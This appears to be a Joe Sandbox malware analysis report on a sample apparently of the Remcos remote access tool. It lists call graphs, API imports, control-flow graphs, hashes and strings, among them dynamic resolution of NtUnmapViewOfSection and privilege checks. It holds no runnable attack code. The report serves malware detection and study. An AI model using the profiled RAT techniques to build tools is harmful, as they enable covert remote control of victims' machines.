std::_Lockit::~_Lockit 46165->46187 46167 432d56 IsProcessorFeaturePresent 46166->46167 46168 432d54 46166->46168 46170 432d98 46167->46170 46168->46150 46209 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46170->46209 46172 432e7b 46172->46150 46173->46157 46175 44d36f ___scrt_is_nonwritable_in_current_image 46174->46175 46176 44d393 46175->46176 46177 44d37c 46175->46177 46188 442d9a EnterCriticalSection 46176->46188 46196 43ad91 20 API calls __dosmaperr 46177->46196 46180 44d3cb 46197 44d3f2 LeaveCriticalSection std::_Lockit::~_Lockit 46180->46197 46181 44d39f 46181->46180 46189 44d2b4 46181->46189 46183 44d381 ___scrt_is_nonwritable_in_current_image __cftoe 46183->46159 46185->46162 46186->46165 46187->46163 46188->46181 46198 443005 46189->46198 46191 44d2d3 46206 443c92 20 API calls _free 46191->46206 46193 44d2c6 46193->46191 46205 445fb3 11 API calls 2 library calls 46193->46205 46194 44d325 46194->46181 46196->46183 46197->46183 46203 443012 __Getctype 46198->46203 46199 443052 46208 43ad91 20 API calls __dosmaperr 46199->46208 46200 44303d RtlAllocateHeap 46201 443050 46200->46201 46200->46203 46201->46193 46203->46199 46203->46200 46207 440480 7 API calls 2 library calls 46203->46207 46205->46193 46206->46194 46207->46203 46208->46201 46209->46172 46211 4328dc GetStartupInfoW 46210->46211 46211->45886 46213 44c24b 46212->46213 46214 44c242 46212->46214 46213->45889 46217 44c138 48 API calls 4 library calls 46214->46217 46216->45889 46217->46213 46219 41a919 LoadLibraryA GetProcAddress 46218->46219 46220 41a909 GetModuleHandleA GetProcAddress 46218->46220 46221 41a947 GetModuleHandleA GetProcAddress 46219->46221 46222 41a937 GetModuleHandleA GetProcAddress 46219->46222 46220->46219 46223 41a973 24 API calls 46221->46223 46224 41a95f GetModuleHandleA GetProcAddress 46221->46224 46222->46221 46223->45894 46224->46223 46374 419493 FindResourceA 46225->46374 46228 439adb new 21 API calls 46229 40ddad ctype 46228->46229 46377 402097 46229->46377 46232 401fc2 28 API calls 46233 40ddd3 46232->46233 46234 401fb8 11 API calls 46233->46234 46235 40dddc 46234->46235 46236 439adb new 21 API calls 46235->46236 46237 40dded ctype 46236->46237 46383 4062ee 46237->46383 46239 40de20 46239->45896 46241 4020ec 46240->46241 46242 4023ae 11 API calls 46241->46242 46243 402106 46242->46243 46244 402549 28 API calls 46243->46244 46245 402114 46244->46245 46245->45899 46435 4020bf 46246->46435 46248 401fb8 11 API calls 46249 419e3c 46248->46249 46250 401fb8 11 API calls 46249->46250 46252 419e44 46250->46252 46251 419e0c 46441 404182 28 API calls 46251->46441 46255 401fb8 11 API calls 46252->46255 46257 40d43c 46255->46257 46256 419e18 46258 401fc2 28 API calls 46256->46258 46268 40e563 46257->46268 46260 419e21 46258->46260 46259 401fc2 28 API calls 46266 419d9a 46259->46266 46261 401fb8 11 API calls 46260->46261 46263 419e29 46261->46263 46262 401fb8 11 API calls 46262->46266 46442 41ab9a 28 API calls 46263->46442 46266->46251 46266->46259 46266->46262 46267 419e0a 46266->46267 46439 404182 28 API calls 46266->46439 46440 41ab9a 28 API calls 46266->46440 46267->46248 46269 40e56f 46268->46269 46271 40e576 46268->46271 46443 402143 11 API calls 46269->46443 46271->45904 46273 402143 46272->46273 46274 40217f 46273->46274 46444 402710 11 API calls 46273->46444 46274->45906 46276 402164 46445 4026f2 11 API calls std::_Deallocate 46276->46445 46279 40e624 46278->46279 46446 40f57c 46279->46446 46285 40e663 46286 40d473 46285->46286 46462 40f663 46285->46462 46288 401e45 46286->46288 46289 401e4d 46288->46289 46291 401e55 46289->46291 46557 402138 22 API calls 46289->46557 46291->45914 46295 40f997 __EH_prolog 46293->46295 46558 40fcfb 46295->46558 46296 40f663 36 API calls 46297 40fb90 46296->46297 46562 40fce0 46297->46562 46299 40d491 46301 40e5ba 46299->46301 46300 40fa1a 46300->46296 46568 40f4c6 46301->46568 46304 40d49a 46306 40dd70 46304->46306 46305 40f663 36 API calls 46305->46304 46578 40e5da 70 API calls 46306->46578 46308 40dd7b 46310 4020bf 11 API calls 46309->46310 46311 40530a 46310->46311 46579 403280 46311->46579 46313 405326 46313->45919 46583 4051cf 46314->46583 46316 408217 46587 402035 46316->46587 46319 401fc2 46320 401fd1 46319->46320 46327 402019 46319->46327 46321 4023ae 11 API calls 46320->46321 46322 401fda 46321->46322 46323 40201c 46322->46323 46324 401ff5 46322->46324 46325 40265a 11 API calls 46323->46325 46602 403078 28 API calls 46324->46602 46325->46327 46328 401fb8 46327->46328 46329 4023ae 11 API calls 46328->46329 46330 401fc1 46329->46330 46330->45933 46332 401fb2 46331->46332 46333 401fa9 46331->46333 46332->45938 46603 4025c0 28 API calls 46333->46603 46335->45946 46336->45966 46337->45976 46338->45949 46339->45967 46340->45969 46341->45995 46342->45969 46343->45980 46344->46054 46345->46057 46346->46022 46347->46062 46348->46066 46349->46079 46350->45956 46351->45999 46352->46013 46353->46017 46354->46024 46355->46030 46356->46031 46357->46035 46358->46039 46359->46068 46360->46080 46361->46117 46362->46122 46363->46128 46364->46129 46365->46105 46366->46110 46367->46113 46368->46118 46369->45974 46371->45987 46604 418ccd 104 API calls 46373->46604 46375 4194b0 LoadResource LockResource SizeofResource 46374->46375 46376 40dd9e 46374->46376 46375->46376 46376->46228 46378 40209f 46377->46378 46386 4023ae 46378->46386 46380 4020aa 46390 4024ea 46380->46390 46382 4020b9 46382->46232 46384 402097 28 API calls 46383->46384 46385 406302 46384->46385 46385->46239 46387 402408 46386->46387 46388 4023b8 46386->46388 46387->46380 46388->46387 46397 402787 11 API calls std::_Deallocate 46388->46397 46391 4024fa 46390->46391 46392 402500 46391->46392 46393 402515 46391->46393 46398 402549 46392->46398 46408 4028c8 46393->46408 46396 402513 46396->46382 46397->46387 46419 402868 46398->46419 46400 40255d 46401 402572 46400->46401 46402 402587 46400->46402 46424 402a14 22 API calls 46401->46424 46404 4028c8 28 API calls 46402->46404 46407 402585 46404->46407 46405 40257b 46425 4029ba 22 API calls 46405->46425 46407->46396 46409 4028d1 46408->46409 46410 402933 46409->46410 46411 4028db 46409->46411 46433 402884 22 API calls 46410->46433 46414 4028e4 46411->46414 46416 4028f7 46411->46416 46427 402c8e 46414->46427 46417 4028f5 46416->46417 46418 4023ae 11 API calls 46416->46418 46417->46396 46418->46417 46420 402870 46419->46420 46421 402878 46420->46421 46426 402c83 22 API calls 46420->46426 46421->46400 46424->46405 46425->46407 46428 402c98 __EH_prolog 46427->46428 46434 402e34 22 API calls 46428->46434 46430 4023ae 11 API calls 46432 402d72 46430->46432 46431 402d04 46431->46430 46432->46417 46434->46431 46436 4020c7 46435->46436 46437 4023ae 11 API calls 46436->46437 46438 4020d2 46437->46438 46438->46266 46439->46266 46440->46266 46441->46256 46442->46267 46443->46271 46444->46276 46445->46274 46466 40f821 46446->46466 46449 40f55d 46544 40f7fb 46449->46544 46451 40f565 46549 40f44c 46451->46549 46453 40e651 46454 40f502 46453->46454 46455 40f510 46454->46455 46461 40f53f std::ios_base::_Ios_base_dtor 46454->46461 46554 4335cb 65 API calls 46455->46554 46457 40f51d 46458 40f44c 20 API calls 46457->46458 46457->46461 46459 40f52e 46458->46459 46555 40fbc8 77 API calls 6 library calls 46459->46555 46461->46285 46463 40f66b 46462->46463 46464 40f67e 46462->46464 46556 40f854 36 API calls 46463->46556 46464->46286 46473 40d2ce 46466->46473 46470 40f83c 46471 40e631 46470->46471 46472 40f663 36 API calls 46470->46472 46471->46449 46472->46471 46474 40d2ff 46473->46474 46475 43229f new 22 API calls 46474->46475 46476 40d306 46475->46476 46483 40cb7a 46476->46483 46479 40f887 46480 40f896 46479->46480 46518 40f8b7 46480->46518 46482 40f89c std::ios_base::_Ios_base_dtor 46482->46470 46486 4332ea 46483->46486 46485 40cb84 46485->46479 46487 4332f6 __EH_prolog3 46486->46487 46498 4330a5 46487->46498 46490 433332 46504 4330fd 46490->46504 46493 433314 46512 43347f 37 API calls _Atexit 46493->46512 46495 433370 std::locale::_Init 46495->46485 46496 43331c 46513 433240 21 API calls 2 library calls 46496->46513 46499 4330b4 46498->46499 46501 4330bb 46498->46501 46514 442df9 EnterCriticalSection _Atexit 46499->46514 46502 4330b9 46501->46502 46515 43393c EnterCriticalSection 46501->46515 46502->46490 46511 43345a 22 API calls 2 library calls 46502->46511 46505 433107 46504->46505 46506 442e02 46504->46506 46507 43311a 46505->46507 46516 43394a LeaveCriticalSection 46505->46516 46517 442de2 LeaveCriticalSection 46506->46517 46507->46495 46510 442e09 46510->46495 46511->46493 46512->46496 46513->46490 46514->46502 46515->46502 46516->46507 46517->46510 46519 4330a5 std::_Lockit::_Lockit 2 API calls 46518->46519 46520 40f8c9 46519->46520 46539 40cae9 4 API calls 2 library calls 46520->46539 46522 40f8dc 46523 40f8ef 46522->46523 46540 40ccd4 77 API calls new 46522->46540 46524 4330fd std::_Lockit::~_Lockit 2 API calls 46523->46524 46525 40f925 46524->46525 46525->46482 46527 40f8ff 46528 40f906 46527->46528 46529 40f92d 46527->46529 46541 4332b6 22 API calls new 46528->46541 46542 436ec6 RaiseException 46529->46542 46532 40f943 46533 40f984 46532->46533 46543 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 46532->46543 46533->46482 46539->46522 46540->46527 46541->46523 46542->46532 46545 43229f new 22 API calls 46544->46545 46546 40f80b 46545->46546 46547 40cb7a 41 API calls 46546->46547 46548 40f813 46547->46548 46548->46451 46550 40f469 46549->46550 46551 40f48b 46550->46551 46553 43aa1a 20 API calls 2 library calls 46550->46553 46551->46453 46553->46551 46554->46457 46555->46461 46556->46464 46560 40fd0e 46558->46560 46559 40fd3c 46559->46300 46560->46559 46566 40fe14 36 API calls 46560->46566 46563 40fce8 46562->46563 46565 40fcf3 46563->46565 46567 40fe79 36 API calls __EH_prolog 46563->46567 46565->46299 46566->46559 46567->46565 46569 40f4d0 46568->46569 46570 40f4d4 46568->46570 46573 40f44c 20 API calls 46569->46573 46576 40f30b 67 API calls 46570->46576 46572 40f4d9 46577 43a716 64 API calls 3 library calls 46572->46577 46575 40e5c5 46573->46575 46575->46304 46575->46305 46576->46572 46577->46569 46578->46308 46581 40328a 46579->46581 46580 4032a9 46580->46313 46581->46580 46582 4028c8 28 API calls 46581->46582 46582->46580 46584 4051db 46583->46584 46593 405254 46584->46593 46586 4051e8 46586->46316 46588 402041 46587->46588 46589 4023ae 11 API calls 46588->46589 46590 40205b 46589->46590 46598 40265a 46590->46598 46594 405262 46593->46594 46597 402884 22 API calls 46594->46597 46599 40266b 46598->46599 46600 4023ae 11 API calls 46599->46600 46601 40206d 46600->46601 46601->46319 46602->46327 46603->46332 46612 411253 61 API calls 46608->46612 46614 4406a8 FindHandlerForForeignException 46613->46614 46615 4406c0 46614->46615 46617 4407f6 _Atexit GetModuleHandleW 46614->46617 46635 442d9a EnterCriticalSection 46615->46635 46618 4406b4 46617->46618 46618->46615 46647 44083a GetModuleHandleExW 46618->46647 46619 440766 46636 4407a6 46619->46636 46622 4406c8 46622->46619 46624 44073d 46622->46624 46655 441450 20 API calls _Atexit 46622->46655 46625 440755 46624->46625 46656 441707 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 46624->46656 46657 441707 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 46625->46657 46626 440783 46639 4407b5 46626->46639 46627 4407af 46658 454909 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 46627->46658 46635->46622 46659 442de2 LeaveCriticalSection 46636->46659 46638 44077f 46638->46626 46638->46627 46660 4461f8 46639->46660 46642 4407e3 46644 44083a _Atexit 8 API calls 46642->46644 46643 4407c3 GetPEB 46643->46642 46645 4407d3 GetCurrentProcess TerminateProcess 46643->46645 46646 4407eb ExitProcess 46644->46646 46645->46642 46648 440864 GetProcAddress 46647->46648 46649 440887 46647->46649 46650 440879 46648->46650 46651 440896 46649->46651 46652 44088d FreeLibrary 46649->46652 46650->46649 46653 432d4b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 46651->46653 46652->46651 46654 4408a0 46653->46654 46654->46615 46655->46624 46656->46625 46657->46619 46659->46638 46661 44621d 46660->46661 46665 446213 46660->46665 46666 4459f9 46661->46666 46663 432d4b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 46664 4407bf 46663->46664 46664->46642 46664->46643 46665->46663 46667 445a25 46666->46667 46668 445a29 46666->46668 46667->46668 46672 445a49 46667->46672 46673 445a95 46667->46673 46668->46665 46670 445a55 GetProcAddress 46671 445a65 __crt_fast_encode_pointer 46670->46671 46671->46668 46672->46668 46672->46670 46674 445ab6 LoadLibraryExW 46673->46674 46678 445aab 46673->46678 46675 445ad3 GetLastError 46674->46675 46676 445aeb 46674->46676 46675->46676 46679 445ade LoadLibraryExW 46675->46679 46677 445b02 FreeLibrary 46676->46677 46676->46678 46677->46678 46678->46667 46679->46676

                          Executed Functions

                          Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                          • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                          • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                          • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                          • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                          • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                          • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                          • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleModule$LibraryLoad
                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                          • API String ID: 551388010-2474455403
                          • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                          • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                          • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                          • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E
                          Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 450 4407b5-4407c1 call 4461f8 453 4407e3-4407ef call 44083a ExitProcess 450->453 454 4407c3-4407d1 GetPEB 450->454 454->453 456 4407d3-4407dd GetCurrentProcess TerminateProcess 454->456 456->453
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                          • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                          • ExitProcess.KERNEL32 ref: 004407EF
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                          • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                          • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                          • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                          Function 0040D3F0 Relevance: 69.0, APIs: 16, Strings: 23, Instructions: 774COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 90 40d991-40d99a call 401fb8 80->90 91 40d67f-40d686 80->91 98 40d622-40d63f call 401f8b call 411f34 81->98 99 40d60f-40d61c WaitForSingleObject CloseHandle 81->99 110 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->110 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 108 40d6b0-40d6b4 95->108 109 40d6a9-40d6ab 95->109 126 40d651 98->126 127 40d641-40d650 call 401f8b call 41239a 98->127 99->98 136 40dd2c 105->136 111 40d6b6-40d6c9 call 401e45 call 401f8b 108->111 112 40d717-40d72a call 401e45 call 401f8b 108->112 109->108 177 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 110->177 111->112 140 40d6cb-40d6d1 111->140 142 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 112->142 143 40d72c call 40e501 112->143 126->80 127->126 141 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 136->141 140->112 146 40d6d3-40d6d9 140->146 187 40dd6a-40dd6f call 413980 141->187 216 40d815-40d819 142->216 217 40d7af-40d7c8 call 401e45 call 401f8b call 439891 142->217 143->142 151 40d6f7-40d710 call 401f8b call 411eea 146->151 152 40d6db-40d6ee call 4060ea 146->152 151->112 175 40d712 call 4066a6 151->175 152->112 168 40d6f0-40d6f5 call 4067a0 152->168 168->112 175->112 221 40da61-40da63 177->221 222 40da65-40da67 177->222 216->110 220 40d81f-40d826 216->220 217->216 250 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 217->250 224 40d8a7-40d8b1 call 408093 220->224 225 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 220->225 226 40da6b-40da7c call 41aa4f CreateThread 221->226 227 40da69 222->227 228 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 222->228 235 40d8b6-40d8de call 40245c call 43254d 224->235 225->235 226->228 227->226 349 40db83-40db9a call 401e45 call 401f8b 228->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 228->350 256 40d8f0 235->256 257 40d8e0-40d8ee call 434c30 235->257 250->216 263 40d8f2-40d967 call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 call 432556 call 401e45 call 40fbab 256->263 257->263 263->177 331 40d96d-40d98c call 401e45 call 419bca call 40de34 263->331 331->177 346 40d98e-40d990 331->346 346->90 359 40dbd9-40dbeb call 401e45 call 401f8b 349->359 360 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->360 350->349 371 40dc4c-40dc5e call 401e45 call 401f8b 359->371 372 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 359->372 360->359 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 371->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 371->384 372->371 383->384 404 40dcc1 384->404 405 40dcc4-40dcd7 CreateThread 384->405 404->405 408 40dce5-40dcec 405->408 409 40dcd9-40dce3 CreateThread 405->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->136 416 40dd03-40dd06 412->416 413->412 416->187 418 40dd08-40dd0d 416->418 418->141
                          APIs
                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                            • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                          • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                          • API String ID: 1529173511-1365410817
                          • Opcode ID: 2dd69d7571eafc38791daeda20d7e1fab6605f3cb407cb475532d63618ebdb48
                          • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                          • Opcode Fuzzy Hash: 2dd69d7571eafc38791daeda20d7e1fab6605f3cb407cb475532d63618ebdb48
                          • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E
                          Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                          • CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                          • closesocket.WS2_32(?), ref: 00404E3A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
